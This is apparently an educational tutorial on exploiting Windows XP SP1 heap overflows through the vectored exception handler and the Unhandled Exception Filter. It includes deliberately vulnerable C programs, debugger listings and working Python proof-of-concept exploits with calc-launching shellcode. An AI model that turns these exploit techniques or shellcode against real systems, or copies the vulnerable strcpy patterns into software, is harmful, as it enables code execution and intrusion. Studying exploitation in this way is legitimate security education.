FuzzySecurity | Heap Overflows For Humans 101

Home »
Tutorials »
Heap Overflows For Humans 101

Heap Overflows For Humans 101

Previously, with stack overflows, we have gained control of the execution pointer (EIP) some how whether that be through the exception handler or directly. Today we are going to discuss a series of techniques that have been tried and tested in time that gain control of execution without directly using EIP or SEH. By overwriting at a location in memory of our choice, with a controlled value, we are able to achieve an arbitrary DWORD overwrite.

If you are unfamiliar with stack based buffer overflows to an intermediate/advanced level then it is suggested that you focus in this area first. What we are about to cover, has been dead and buried for a while, so if you are looking for newer techniques to exploit the windows heap manager, don't stick around ;)

What you will need:
- Windows XP with just sp1 installed.
- A debugger (Olly Debugger, Immunity Debugger, windbg etc).
- A c/c++ compilier (Dev C++, lcc-32, MS visual C++ 6.0 (if you can still get it)).
- A scripting language of ease (I use python, maybe you can use perl).
- A brain (and/or persistence).
- Some knowledge of Assembly, C and knowledge on how to dig through a debugger using HideDbg (plugin) for Olly or !hidedebug under immunity debugger
- Time.

We are going to focus on the core basics and fundamentals. The techniques presented will most probably be too old to use in the "real world" however it must always be reminded that if one wants to move forward, one must know the past. And learn from it. Ok lets begin!

What is the heap and how does it work under XP?

The heap is a storage area where a process can retain data. Each process dynamically allocates and releases heap memory based on the requirements of the application this memory is globally accessible. It is important to point out that the stack grows towards 0x00000000 and yet the heap grows towards 0xFFFFFFFF. This means that if a process was to call HeapAllocate() twice, the second call would return a pointer that is higher than the first. Therefore any overflow of the first block will overflow into the second block.

Every process whether it is the default process heap or a dynamically allocated heap will contain multiple data structures. One of those data structures is an array of 128 LIST_ENTRY structures that keeps track of free blocks. This is known as the FreeLists. Each list entry holds two pointers at the beginning of the array and can be found at offset 0x178 into the heap structure. When a heap is created two pointers, which point to the first free block of memory that is available for allocation, are set at FreeLists[0].

Let that sink in, and then think about this. Assuming we have a heap with a base address of 0x00650000 and the first available block is located at 0x00650688 then we can assume the following four addresses:

At address 0x00650178 (Freelist[0].Flink) is a pointer with the value of 0x00650688 (Our first free block)
At address 0x0065017c (FreeList[0].Blink) is a pointer with the value of 0x00650688 (Our first free block)
At address 0x00650688 (Our first free block) is a pointer with the value of 0x00650178 (FreeList[0])
At address 0x0065068c (Our first free block) is a pointer with the value of 0x00650178 (FreeList[0])

When an allocation occurs, the FreeList[0].Flink and FreeList[0].Blink pointers are updated to point to the next free block that will be allocated. Furthermore the two pointers that point back to the FreeList are moved to the end of the newly allocated block . Every allocation or free, these pointers are updated. Therefore, these allocations are tracked in a doubly linked list.

When a heap buffer is overflowed into the heap control data, the updating of these pointers allows the arbitrary dword overwrites. An attacker at this point has the opportunity to modify the program control data such as function pointers and gain control of the processes execution path.

Exploiting Heap Overflows using Vectored Exception Handling

First, lets begin with our heap-veh.c code:

#include <windows.h>
#include <stdio.h>

        DWORD MyExceptionHandler(void);
        int foo(char *buf);

        int main(int argc, char *argv[])
        {
                HMODULE l;
                l = LoadLibrary("msvcrt.dll");
                l = LoadLibrary("netapi32.dll");
                printf("\n\nHeapoverflow program.\n");
                if(argc != 2)
                        return printf("ARGS!");
                foo(argv[1]);
                return 0;
        }

        DWORD MyExceptionHandler(void)
        {
                printf("In exception handler....");
                ExitProcess(1);
                return 0;
        }

        int foo(char *buf)
        {
                HLOCAL h1 = 0, h2 = 0;
                HANDLE hp;

                __try{
                        hp = HeapCreate(0,0x1000,0x10000);
                        if(!hp){
                                return printf("Failed to create heap.\n");
            }
                        h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);

                        printf("HEAP: %.8X %.8X\n",h1,&h1);

                        // Heap Overflow occurs here:
                        strcpy(h1,buf);

                        // This second call to HeapAlloc() is when we gain control
                        h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);
                        printf("hello");
                }
                __except(MyExceptionHandler())
                {
                        printf("oops...");
                }
                return 0;
        }

From the above code, we can see that their will be exception handling due to the __try block statement. Begin by compiling the code with your favourite compiler under Windows XP SP1.

Run the application on the command line, notice how it takes over 260 bytes for the exception handler to kick in.

Hitting the exception handler, getting ready to trigger the vectored handler

Now of course when we run this in the debugger, we gain control of the second allocation (because freelist[0] is being updated with our attack string from the first allocation).

MOV DWORD PTR DS:[ECX],EAX
MOV DWORD PTR DS:[EAX+4],ECX

These instructions are saying "Make the current value of EAX the pointer of ECX and make the current value of ECX the value of EAX at the next 4 bytes". From this we know we are unlinking or freeing the first allocated memory block.

EAX  (what we write) : Blink
ECX  (location of where to write) : Flink

So what is vectored exception handling?

Vectored exception handling was introduced in windows XP and stores exception registration structures on the heap, unlike traditional frame exception handling such as SEH that stores its structure on the stack. This type of exception is called before any other frame based exception handling. The following structure depicts it's layout:

struct _VECTORED_EXCEPTION_NODE
{
    DWORD   m_pNextNode;
    DWORD   m_pPreviousNode;
    PVOID   m_pfnVectoredHandler;
}

All that you need to know is that the m_pNextNode points to the next _VECTORED_EXCEPTION_NODE structure therefore we must overwrite the pointer to _VECTORED_EXCEPTION_NODE (m_pNextNode) with our fake pointer. But what do we overwrite it with? lets take a look at the code that is responsible for dispatching the _VECTORED_EXCEPTION_NODE:

77F7F49E   8B35 1032FC77    MOV ESI,DWORD PTR DS:[77FC3210]
77F7F4A4   EB 0E            JMP SHORT ntdll.77F7F4B4
77F7F4A6   8D45 F8          LEA EAX,DWORD PTR SS:[EBP-8]
77F7F4A9   50               PUSH EAX
77F7F4AA   FF56 08          CALL DWORD PTR DS:[ESI+8]

So we MOV the pointer of _VECTORED_EXCEPTION_NODE into ESI and then shortly after we call ESI + 8. If we set the next pointer of the _VECTORED_EXCEPTION_NODE to an address that points at our shellcode - 0x08, then we should land very neatly in our buffer. Where do we find a pointer to our shellcode? Well there is one on the stack:

Leaking a pointer to our shellcode off the stack

We can see our pointer to our shellcode on the stack. Ok no stress, lets use this hardcoded value 0x0012ff40. Except remember the call esi+8? well lets make sure we are right on target, so 0x0012ff40 - 0x08 = 0x0012ff38. Excellent so ECX is going to be set to 0x0012ff38. How do we find the m_NextNode (pointer to next _VECTORED_EXCEPTION_NODE)? Well in Olly (or immunity debugger) we can parse our exception so far using shift+f7 and try and continue through the code. The code will setup for the call to the first _VECTORED_EXCEPTION_NODE and as such will reveal the pointer:

77F60C2C   BF 1032FC77      MOV EDI,ntdll.77FC3210
77F60C31   393D 1032FC77    CMP DWORD PTR DS:[77FC3210],EDI
77F60C37   0F85 48E80100    JNZ ntdll.77F7F485

You can see that the code is moving the m_pNextNode (our pointer that we need) into EDI. Excellent, lets set EAX to that value. So as it stands, we have the following values set: ECX = 0x77fc3210 EAX = 0x0012ff38. Of course we need our offsets to EAX and ECX, so we just create an MSF pattern and feed it into the application. Here is a quick reminder for your viewing pleasure:

Create msf pattern

Calculate offsets by turning on anti-debugging and triggering the exception

Setting anti-debug with the HideDbg Olly plugin

Overwriting EAX/ECX with a unique pattern

Ok so here is a skeleton PoC exploit:

import os

# _vectored_exception_node
exploit = ("\xcc" * 272)

# ECX pointer to next _VECTORED_EXCEPTION_NODE = 0x77fc3210 - 0x04
# due to second MOV writes to EAX+4 == 0x77fc320c
exploit += ("\x0c\x32\xfc\x77") # ECX

# EAX ptr to shellcode located at 0012ff40 - 0x8 == 0012ff38
exploit += ("\x38\xff\x12") # EAX - we don't need the null byte

os.system('"C:\\Documents and Settings\\Steve\\Desktop\\odbg110\\OLLYDBG.EXE" heap-veh.exe ' + exploit)

At this stage we cannot have shellcode after our ECX instruction because it contains a null byte. This may not always be the case as in this example we are using a strcpy to store our buffer in the heap.

Ok, at this point we hit our software breakpoints at "\xcc" and can simply replace this with some shellcode. The shellcode must not be more than 272 bytes as this is the only spot to place our shellcode.

import os
import win32api

calc = (
"\xda\xcb\x2b\xc9\xd9\x74\x24\xf4\x58\xb1\x32\xbb\xfa\xcd" +
"\x2d\x4a\x83\xe8\xfc\x31\x58\x14\x03\x58\xee\x2f\xd8\xb6" +
"\xe6\x39\x23\x47\xf6\x59\xad\xa2\xc7\x4b\xc9\xa7\x75\x5c" +
"\x99\xea\x75\x17\xcf\x1e\x0e\x55\xd8\x11\xa7\xd0\x3e\x1f" +
"\x38\xd5\xfe\xf3\xfa\x77\x83\x09\x2e\x58\xba\xc1\x23\x99" +
"\xfb\x3c\xcb\xcb\x54\x4a\x79\xfc\xd1\x0e\x41\xfd\x35\x05" +
"\xf9\x85\x30\xda\x8d\x3f\x3a\x0b\x3d\x4b\x74\xb3\x36\x13" +
"\xa5\xc2\x9b\x47\x99\x8d\x90\xbc\x69\x0c\x70\x8d\x92\x3e" +
"\xbc\x42\xad\x8e\x31\x9a\xe9\x29\xa9\xe9\x01\x4a\x54\xea" +
"\xd1\x30\x82\x7f\xc4\x93\x41\x27\x2c\x25\x86\xbe\xa7\x29" +
"\x63\xb4\xe0\x2d\x72\x19\x9b\x4a\xff\x9c\x4c\xdb\xbb\xba" +
"\x48\x87\x18\xa2\xc9\x6d\xcf\xdb\x0a\xc9\xb0\x79\x40\xf8" +
"\xa5\xf8\x0b\x97\x38\x88\x31\xde\x3a\x92\x39\x71\x52\xa3" +
"\xb2\x1e\x25\x3c\x11\x5b\xd9\x76\x38\xca\x71\xdf\xa8\x4e" +
"\x1c\xe0\x06\x8c\x18\x63\xa3\x6d\xdf\x7b\xc6\x68\xa4\x3b" +
"\x3a\x01\xb5\xa9\x3c\xb6\xb6\xfb\x5e\x59\x24\x67\xa1\x93")

# _vectored_exception_node
exploit = ("\x90" * 5)
exploit += (calc)
exploit += ("\xcc" * (272-len(exploit)))

# ECX pointer to next _VECTORED_EXCEPTION_NODE = 0x77fc3210 - 0x04
# due to second MOV writes to EAX+4 == 0x77fc320c
exploit += ("\x0c\x32\xfc\x77") # ECX

# EAX ptr to shellcode located at 0012ff40 - 0x8 == 0012ff38
exploit += ("\x38\xff\x12") # EAX - we dont need the null byte

win32api.WinExec(('heap-veh.exe %s') % exploit, 1)

Exploiting Heap Overflows using the Unhandled Exception Filter

The Unhandler Exception Filter is the last exception to be called before an application closes. It is responsible for dispatching of the very common message "An unhandled error occurred" when an application suddenly crashes. Up until this point, we have gotten to the stage of controlling EAX and ECX and knowing the offset location to both registers:

import os

exploit = ("\xcc" * 272)
exploit += ("\x41" * 4) # ECX
exploit += ("\x42" * 4) # EAX
exploit += ("\xcc" * 272)

os.system('"C:\\Documents and Settings\\Steve\\Desktop\\odbg110\\OLLYDBG.EXE" heap-uef.exe ' + exploit)

Unlike the previous example, our heap-uef.c file contains no traces of a custom exception handler. This means we are going to exploit the application using Microsoft's default Unhandled Exception Filter. Below is the heap-uef.c file:

#include <stdio.h>
#include <windows.h>

        int foo(char *buf);
        int main(int argc, char *argv[])
        {
                HMODULE l;
                l = LoadLibrary("msvcrt.dll");
                l = LoadLibrary("netapi32.dll");
                printf("\n\nHeapoverflow program.\n");
                if(argc != 2)
                        return printf("ARGS!");
                foo(argv[1]);
                return 0;
        }

        int foo(char *buf)
        {
                HLOCAL h1 = 0, h2 = 0;
                HANDLE hp;

                hp = HeapCreate(0,0x1000,0x10000);
                if(!hp)
                        return printf("Failed to create heap.\n");
                h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);
                printf("HEAP: %.8X %.8X\n",h1,&h1);

                // Heap Overflow occurs here:
                strcpy(h1,buf);

                // We gain control of this second call to HeapAlloc
                h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);
                printf("hello");
                return 0;
        }

When debugging this type of overflow, its important to turn anti debugging on within Olly or Immunity Debugger so that our Exception Filter is called and the offsets are at the correct location. First of all, we must find where we are going to write our dword too. This would be the pointer to the Unhandled Exception Filter. This can be found by going to and looking at the code for SetUnhandledExceptionFilter().

We can be see that a MOV instruction writes a value to the UnhandledExceptionFilter (0x77ed73b4) address:

Finding the pointer to UnhandledExceptionFilter (0x77ed73b4)

When the call to SetUnhandledExceptionFilter() is made, it will write the value of ECX to the pointer provided by the UnhandledExceptionFilter. This may seem confusing at first as the unlink() process triggers ECX --> EAX, but in this specific case, we are abusing the way SetUnhandledExceptionFilter() sets up the UnhandledExceptionFilter function call. At this point, we can safely say that ECX will contain a pointer that pivots control to our shellcode. The following code should clear up any doubts:

77E93114   A1 B473ED77      MOV EAX,DWORD PTR DS:[77ED73B4]
77E93119   3BC6             CMP EAX,ESI
77E9311B   74 15            JE SHORT kernel32.77E93132
77E9311D   57               PUSH EDI
77E9311E   FFD0             CALL EAX

Basically, the value at UnhandledExceptionFilter() is parsed into EAX and then soon after a call EAX is triggered. So we have UnhandledExceptionFilter() --> [attackers pointer], then the attackers pointer is dereferenced from UnhandledExceptionFilter() into EAX and executed. This pointer will then transfer control to our shellcode, or an instruction that will get us back to our shellcode.

If we take a look at EDI, we will notice a pointer at 0x78 bytes from the bottom of our payload.

EDI + 74 bytes contains a pointer to our shellcode

If we simply call this pointer, we will be executing our shellcode. Therefore we need an instruction in EAX such as:

call dword ptr ds:[edi+74]

This instruction is easily found in many MS modules under XP sp1.

So then lets fill in these values into our PoC and see where we land:

import os

exploit = ("\xcc" * 272)
exploit += ("\xad\xbb\xc3\x77") # ECX 0x77C3BBAD --> call dword ptr ds:[EDI+74]
exploit += ("\xb4\x73\xed\x77") # EAX 0x77ED73B4 --> UnhandledExceptionFilter()
exploit += ("\xcc" * 272)

os.system('"C:\\Documents and Settings\\Steve\\Desktop\\odbg110\\OLLYDBG.EXE" heap-uef.exe ' + exploit)

Hitting our shellcode after the call dword EDI+74

Of course we simply calculate the offset to this part of the shellcode and insert our JMP instruction code and our shellcode:

import os

calc = (
"\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"
"\x44\x80\xc2\x77"        # address to WinExec()
"\xFF\xD1\x90\x90")

exploit = ("\x44" * 264)
exploit += "\xeb\x14"           # our JMP (over the junk and into nops)
exploit += ("\x44" * 6)
exploit += ("\xad\xbb\xc3\x77") # ECX 0x77C3BBAD --> call dword ptr ds:[EDI+74]
exploit += ("\xb4\x73\xed\x77") # EAX 0x77ED73B4 --> UnhandledExceptionFilter()
exploit += ("\x90" * 21)
exploit += calc

os.system('heap-uef.exe ' + exploit)

Executing our JMP and landing in shellcode

Boom!

Conclusion

We have demonstrated two techniques for exploiting unlink() in its most primitive form under windows XP sp1. Other techniques can also apply such as RtlEnterCriticalSection or TEB Exception Handler exploitation. Following on from here we will present exploiting Unlink() (HeapAlloc/HeapFree) under Windows XP sp2 and 3 and bypass windows protections against the heap.

POC's
http://www.exploit-db.com/exploits/12240/
http://www.exploit-db.com/exploits/15957/

References
The shellcoder’s handbook (Chris Anley, John Heasman, FX, Gerardo Richarte)
David Litchfield (http://www.blackhat.com/presentations/win-usa-04/bh-win-04-litchfield/bh-win-04-litchfield.ppt)